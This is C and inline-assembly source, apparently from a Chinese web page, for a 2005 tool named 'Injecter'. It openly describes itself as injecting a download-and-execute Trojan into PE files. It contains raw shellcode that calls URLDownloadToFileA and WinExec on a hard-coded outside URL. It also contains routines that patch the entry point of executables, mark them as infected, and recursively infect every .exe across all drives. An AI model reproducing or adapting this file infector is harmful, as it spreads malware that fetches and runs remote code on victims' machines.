|
/*
思路:把一个download && execute shellcode改装注射到pe文件的空闲字节处
enjoy it!
*/
#include
#include
//#define CODESIZE 439
typedef struct _DISKLIST //用于保存磁盘驱动器信息的链表
{
_DISKLIST *next;
char RootPath[6];
}DISKLIST,*PDISKLIST;
unsigned char *injectcode;
DWORD CodeSize;
unsigned char code_dll_header[]=
"\xE9\xF4\x00\x00\x00\x5A\xB8\x0C\xF0\xFD\x7F\x8B\x00\x8B\x70\x1C"
"\xAD\x8B\x40\x08\x8B\xD8\x8B\x73\x3C\x03\xF3\x8B\x76\x78\x03\xF3"
"\x8B\x7E\x20\x03\xFB\x8B\x4E\x14\x33\xED\x56\x57\x51\x8B\x3F\x03"
"\xFB\x8B\xF2\x6A\x0E\x59\xF3\xA6\x74\x08\x59\x5F\x83\xC7\x04\x45"
"\xE2\xE9\x59\x5F\x5E\x8B\xCD\x8B\x46\x24\x03\xC3\xD1\xE1\x03\xC1"
"\x33\xC9\x66\x8B\x08\x8B\x46\x1C\x03\xC3\xC1\xE1\x02\x03\xC1\x8B"
"\x00\x03\xC3\x8B\xFA\x8B\xF7\x83\xC6\x0E\x8B\xD0\x6A\x06\x59\xE8"
"\x70\x00\x00\x00\x83\xC6\x0D\x52\x56\xFF\x57\xFC\x5A\x8B\xD8\x6A"
"\x01\x59\xE8\x5D\x00\x00\x00\x83\xC6\x13\x56\x46\x80\x3E\x80\x75"
"\xFA\x80\x36\x80\x5E\x83\xEC\x20\x8B\xDC\x6A\x20\x53\xFF\x57\xE4"
"\xC7\x04\x18\x5C\x72\x74\x2E\xC7\x44\x18\x04\x64\x6C\x6C\x00\x90"
"\x81\xEC\x40\x01\x00\x00\x54\x53\xFF\x57\xF0\x83\xF8\x00\x7E\x08"
"\x53\xFF\x57\xEC\x85\xC0\x74\x16\x33\xC0\x50\x50\x53\x56\x50\xFF"
"\x57\xFC\x85\xC0\x75\x08\x50\x83\xC6\x2B\x56\xFF\x57\xE8\xE9\xA2"
"\xA2\xA2\xA2\x90\x33\xC0\xAC\x85\xC0\x75\xF9\x51\x52\x56\x53\xFF"
"\xD2\x5A\x59\xAB\xE2\xEE\x33\xC0\xC3\xE8\x07\xFF\xFF\xFF\x47\x65"
"\x74\x50\x72\x6F\x63\x41\x64\x64\x72\x65\x73\x73\x00\x47\x65\x74"
"\x53\x79\x73\x74\x65\x6D\x44\x69\x72\x65\x63\x74\x6F\x72\x79\x41"
"\x00\x57\x69\x6E\x45\x78\x65\x63\x00\x44\x65\x6C\x65\x74\x65\x46"
"\x69\x6C\x65\x41\x00\x46\x69\x6E\x64\x46\x69\x72\x73\x74\x46\x69"
"\x6C\x65\x41\x00\x45\x78\x69\x74\x50\x72\x6F\x63\x65\x73\x73\x00"
"\x4C\x6F\x61\x64\x4C\x69\x62\x72\x61\x72\x79\x41\x00\x75\x72\x6C"
"\x6D\x6F\x6E\x00\x55\x52\x4C\x44\x6F\x77\x6E\x6C\x6F\x61\x64\x54"
"\x6F\x46\x69\x6C\x65\x41\x00";
unsigned char code_exe_header[]=
"\xE9\xF4\x00\x00\x00\x5A\xB8\x0C\xF0\xFD\x7F\x8B\x00\x8B\x70\x1C"
"\xAD\x8B\x40\x08\x8B\xD8\x8B\x73\x3C\x03\xF3\x8B\x76\x78\x03\xF3"
"\x8B\x7E\x20\x03\xFB\x8B\x4E\x14\x33\xED\x56\x57\x51\x8B\x3F\x03"
"\xFB\x8B\xF2\x6A\x0E\x59\xF3\xA6\x74\x08\x59\x5F\x83\xC7\x04\x45"
"\xE2\xE9\x59\x5F\x5E\x8B\xCD\x8B\x46\x24\x03\xC3\xD1\xE1\x03\xC1"
"\x33\xC9\x66\x8B\x08\x8B\x46\x1C\x03\xC3\xC1\xE1\x02\x03\xC1\x8B"
"\x00\x03\xC3\x8B\xFA\x8B\xF7\x83\xC6\x0E\x8B\xD0\x6A\x06\x59\xE8"
"\x70\x00\x00\x00\x83\xC6\x0D\x52\x56\xFF\x57\xFC\x5A\x8B\xD8\x6A"
"\x01\x59\xE8\x5D\x00\x00\x00\x83\xC6\x13\x56\x46\x80\x3E\x80\x75"
"\xFA\x80\x36\x80\x5E\x83\xEC\x20\x8B\xDC\x6A\x20\x53\xFF\x57\xE4"
"\xC7\x04\x18\x5C\x72\x74\x2E\xC7\x44\x18\x04\x65\x78\x65\x00\x90"
"\x81\xEC\x40\x01\x00\x00\x54\x53\xFF\x57\xF0\x83\xF8\x00\x7E\x08"
"\x53\xFF\x57\xEC\x85\xC0\x74\x16\x33\xC0\x50\x50\x53\x56\x50\xFF"
"\x57\xFC\x85\xC0\x75\x08\x50\x53\x90\x90\x90\xFF\x57\xE8\xE9\xA2"
"\xA2\xA2\xA2\x90\x33\xC0\xAC\x85\xC0\x75\xF9\x51\x52\x56\x53\xFF"
"\xD2\x5A\x59\xAB\xE2\xEE\x33\xC0\xC3\xE8\x07\xFF\xFF\xFF\x47\x65"
"\x74\x50\x72\x6F\x63\x41\x64\x64\x72\x65\x73\x73\x00\x47\x65\x74"
"\x53\x79\x73\x74\x65\x6D\x44\x69\x72\x65\x63\x74\x6F\x72\x79\x41"
"\x00\x57\x69\x6E\x45\x78\x65\x63\x00\x44\x65\x6C\x65\x74\x65\x46"
"\x69\x6C\x65\x41\x00\x46\x69\x6E\x64\x46\x69\x72\x73\x74\x46\x69"
"\x6C\x65\x41\x00\x45\x78\x69\x74\x50\x72\x6F\x63\x65\x73\x73\x00"
"\x4C\x6F\x61\x64\x4C\x69\x62\x72\x61\x72\x79\x41\x00\x75\x72\x6C"
"\x6D\x6F\x6E\x00\x55\x52\x4C\x44\x6F\x77\x6E\x6C\x6F\x61\x64\x54"
"\x6F\x46\x69\x6C\x65\x41\x00";
WIN32_FIND_DATA fd;
int ret;
DWORD dd;
PDISKLIST d_hlist=NULL,d_plist=NULL,d_padd=NULL;
char szWinDir[MAX_PATH]={0};
int WINAPI InjectCode(char *lpFileName)
{
HANDLE hFile,hMap;
DWORD dwSize=0,dwSizeHigh=0,dwAddr;
char buff[100]={0};
DWORD dd;
DWORD dwPeHdr,dwSecAddr,dwOldEntryPointer,dwNewEntryPointer;
hFile=CreateFile(lpFileName,
GENERIC_READ + GENERIC_WRITE,
FILE_SHARE_READ + FILE_SHARE_WRITE,
0,
OPEN_EXISTING,
0,
0);
if (hFile<=0)
{
return -1;
}
dwSize=GetFileSize(hFile,&dwSizeHigh);
if ((dwSize<=0)||(dwSizeHigh>0))
{
CloseHandle(hFile);
return -1;
}
//printf("size=%d\n",dwSize);
hMap=CreateFileMapping((HANDLE)hFile,
NULL,
PAGE_READWRITE,
0,
0,
NULL);
if (hMap<=0)
{
CloseHandle(hFile);
return -1;
}
dwAddr=(DWORD)MapViewOfFile(hMap,
FILE_MAP_WRITE,
0,
0,
0);
try
{
_asm
{
mov esi,dwAddr
cmp WORD ptr [esi],'ZM'
jne _injectnot
add esi,DWORD ptr [esi+3ch] ;指向PE_HEADER
cmp WORD ptr [esi],'EP'
jne _injectnot
mov dwPeHdr,esi
mov eax,[esi+28h]
mov dwOldEntryPointer,eax
cmp dword ptr [esi+8],'rude' ;判断感染标志
je _isinjected
mov ecx,DWORD ptr [esi+74h] ;得到directory的数目 NumberOfRvaAndSizes
imul ecx,ecx,8
lea eax,[ecx+esi+78h] ;data directory eax->节表起始地址
movzx ecx,word ptr [esi+6h] ;ecx->节数目
mov edi,eax
xor edx,edx
dec edx
_loop1:
inc edx
imul eax,edx,28h
mov ebx,dword ptr [edi+eax+10h] ;SizeOfRawData 28h->节表大小
sub ebx,[edi+eax+8h] ;SizeOfRawData-VirtualSize 剩余空间
cmp ebx,CodeSize
jg _writecode ;写入代码
mov dd,ebx
push ecx
push edx
}
//printf("%d\n",dd);
_asm
{
pop edx
pop ecx
loop _loop1
jmp _injectnot
_writecode:
add edi,eax
mov dwSecAddr,edi
mov ebx,[edi+0ch] ;VirtualAddress
add ebx,[edi+8h] ;ebx->代码在内存中地址
mov dwNewEntryPointer,ebx
add ebx,0deh ;ebx->jmp EntryPoint指令地址
sub ebx,dwOldEntryPointer
mov eax,0FFFFFFFFh
sub eax,ebx
sub eax,4
mov esi,injectcode ;更新跳转指令码
add esi,0dfh
mov dword ptr [esi],eax
mov ebx,[edi+14h] ;PointerToRawData
add ebx,[edi+8h] ;ebx->代码写入地址
add ebx,dwAddr
mov edi,ebx
mov ecx,CodeSize
mov esi,injectcode
rep movsb ;写入代码
mov edi,dwSecAddr
mov dword ptr [edi+24h],0E0000020h ;节属性
mov esi,dwPeHdr
mov dword ptr [esi+8h],'rude' ;写入感染标志
mov eax,dwNewEntryPointer
mov dword ptr [esi+28h],eax ;更新EntryPoint
}
UnmapViewOfFile((LPCVOID)dwAddr);
CloseHandle(hMap);
CloseHandle(hFile);
return 0;
_asm
{
_injectnot:
_exit:
}
UnmapViewOfFile((LPCVOID)dwAddr);
CloseHandle(hMap);
CloseHandle(hFile);
return -1;
_asm
{
_isinjected:
}
UnmapViewOfFile((LPCVOID)dwAddr);
CloseHandle(hMap);
CloseHandle(hFile);
return -2;
} //异常捕获
catch (...)
{
printf("error!\n");
}
}
int WINAPI ckDirS(char *szDir)
{
HANDLE hSearch;
char szDirectory[MAX_PATH];
char szDirTmp[MAX_PATH];
dd=strlen(szWinDir);
if (memcmp(strupr(szDir),strupr(szWinDir),dd)==0) //跳过windows目录
{
return 0;
}
memset(&fd,0,sizeof(WIN32_FIND_DATA));
strncpy(szDirectory,szDir,MAX_PATH);
strcat(szDirectory,"*.*");
hSearch=FindFirstFile((LPCTSTR)szDirectory,&fd);
if (hSearch==INVALID_HANDLE_VALUE)
{
return -1;
}
do
{
if (fd.cFileName[0]!='.')
{
if(fd.dwFileAttributes&FILE_ATTRIBUTE_DIRECTORY) //目录
{
memset(szDirTmp,0,MAX_PATH);
strcat(szDirTmp,szDir);
strcat(szDirTmp,fd.cFileName);
strcat(szDirTmp,"\\");
ckDirS(szDirTmp);
}
else
{
dd=strlen(fd.cFileName);
if ((fd.cFileName[dd-4]=='.')&&
(fd.cFileName[dd-3]=='e')&&
(fd.cFileName[dd-2]=='x')&&
(fd.cFileName[dd-1]=='e'))
{
memset(szDirTmp,0,MAX_PATH);
strcat(szDirTmp,szDir);
strcat(szDirTmp,fd.cFileName);
printf("inject:%s...",szDirTmp);
ret=InjectCode(szDirTmp);
if (ret==0)
{
printf("ok!\n");
}
else if (ret==-1)
{
printf("faild!\n");
}
else if (ret==-2)
{
printf("injected!\n");
}
}
}
}
}
while (FindNextFile(hSearch,&fd));
return 0;
}
int WINAPI ckDir(char *szDir)
{
HANDLE hSearch;
char szDirectory[MAX_PATH];
char szDirTmp[MAX_PATH];
memset(&fd,0,sizeof(WIN32_FIND_DATA));
strncpy(szDirectory,szDir,MAX_PATH);
strcat(szDirectory,"*.exe");
hSearch=FindFirstFile((LPCTSTR)szDirectory,&fd);
if (hSearch==INVALID_HANDLE_VALUE)
{
return -1;
}
do
{
if (fd.cFileName[0]!='.')
{
memset(szDirTmp,0,MAX_PATH);
strcat(szDirTmp,szDir);
strcat(szDirTmp,fd.cFileName);
printf("inject:%s...",szDirTmp);
ret=InjectCode(szDirTmp);
if (ret==0)
{
printf("ok!\n");
}
else if (ret==-1)
{
printf("faild!\n");
}
else if (ret==-2)
{
printf("injected!\n");
}
}
}
while (FindNextFile(hSearch,&fd));
return 0;
}
void start(void)
{
printf("\n");
printf("Injecter //--A Tool Can Inject The Download&&Execute Trojan To The PE File\n");
printf("Written By Ruder [2005/3],E-mail:cocoruder@163.com\n");
printf("Homepage:http://ruder.cdut.net,enjoy it!\n");
printf("Usage:\n");
printf("\tInjecter [order] [param]\n");
printf("\t[order]:\n");
printf("-all ---Inject all the exe file on disk except windows directory\n");
printf("-s ---under the directory,will scan the sub directory\n");
printf("-d ---under the directory,will not scan the sub directory\n");
printf("example:\n");
printf("\tInjecter -all\n");
printf("\tInjecter -s e:\\\n");
printf("\tInjecter -d d:\\\n");
printf("\n");
}
int WINAPI BrowDisk_SaveDiskInfoToList(char *lpChar)
{
//解码,添加磁盘名到链表
d_padd=(PDISKLIST)malloc(sizeof(_DISKLIST));
if (d_padd==NULL)
{
return -1;
}
memset(d_padd->RootPath,0,6);
strncpy(d_padd->RootPath,lpChar,strlen(lpChar));
d_padd->next=NULL;
if (d_hlist==NULL) //首链为空
{
d_hlist=d_padd;
d_plist=d_hlist;
}
else //添加至链表
{
d_plist->next=d_padd;
d_plist=d_padd;
}
return 0;
}
BOOL WINAPI BrowDisk_GetLogicalDriveList(VOID)
{
char BDBuffer[128];
char *lpChar;
memset(BDBuffer, 0x00, 128);
if (GetLogicalDriveStrings(128, BDBuffer) == 0 )
{
return FALSE;
}
for (lpChar=BDBuffer;*lpChar!=0x00;lpChar=lpChar+strlen(lpChar)+1)
{
BrowDisk_SaveDiskInfoToList(lpChar);
}
}
int WINAPI InjectAll(void)
{
PDISKLIST p1;
BrowDisk_GetLogicalDriveList();
p1=d_hlist;
if (p1==NULL)
{
return -1;
}
while (1)
{
ckDirS(p1->RootPath);
p1=p1->next;
if (p1==NULL)
{
break;
}
}
return 0;
}
int MakeInjectCode_Dll(char *szGetStr,char *szRunStr)
{
DWORD dd1,dd2,i;
dd1=strlen(szGetStr)+1;
dd2=strlen(szRunStr)+1;
CodeSize=sizeof(code_dll_header)+dd1+dd2-1;
injectcode=(unsigned char *)malloc(CodeSize);
if (injectcode==NULL)
{
return -1;
}
printf("%.8x\n",(DWORD)injectcode);
*(char *)(code_dll_header+0xD9)=(char)dd1;
i=sizeof(code_dll_header);
memcpy(injectcode,code_dll_header,i);
memcpy(injectcode+i-1,szGetStr,dd1);
i=i+dd1-1;
*(char *)(injectcode+i-1)=0x80;
memcpy(injectcode+i,szRunStr,dd2);
printf("%.8x\n",(DWORD)injectcode);
return 0;
}
int MakeInjectCode_Exe(char *szGetStr)
{
DWORD dd1,i;
dd1=strlen(szGetStr)+1;
CodeSize=sizeof(code_exe_header)+dd1-1;
injectcode=(unsigned char *)malloc(CodeSize);
if (injectcode==NULL)
{
return -1;
}
i=sizeof(code_exe_header);
memcpy(injectcode,code_exe_header,i);
memcpy(injectcode+i-1,szGetStr,dd1);
i=i+dd1-1;
*(char *)(injectcode+i-1)=0x80;
return 0;
}
void main(int argc,char *argv[])
{
int orderid;
// InjectCode("C:\\NTFSDOS\\ntfschk.exe");
// return;
MakeInjectCode_Exe("http://www.xloading.com/ruder/calc.exe");
printf("SizeCode=%d\n",CodeSize);
printf("%d\n",InjectCode("d:\\a\\pslist.exe"));
/*
if ((argc!=2)&&(argc!=3))
{
start();
return;
}
GetWindowsDirectory(szWinDir,MAX_PATH);
strcat(szWinDir,"\\");
if (strcmp(argv[1],"-all")==0)
{
orderid=0;
InjectAll();
return;
}
if (strcmp(argv[1],"-s")==0)
{
orderid=1;
if (argc==2)
{
start();
return;
}
if (argv[2][strlen(argv[2])-1]!='\\')
{
start();
return;
}
ckDirS(argv[2]);
return;
}
if (strcmp(argv[1],"-d")==0)
{
orderid=2;
if (argc==2)
{
start();
return;
}
if (argv[2][strlen(argv[2])-1]!='\\')
{
start();
return;
}
ckDir(argv[2]);
return;
}
start();
*/
}
|
用户登录 
新用户注册 
网友评论:(只显示最新10条。评论内容只代表网友观点,与本站立场无关!)
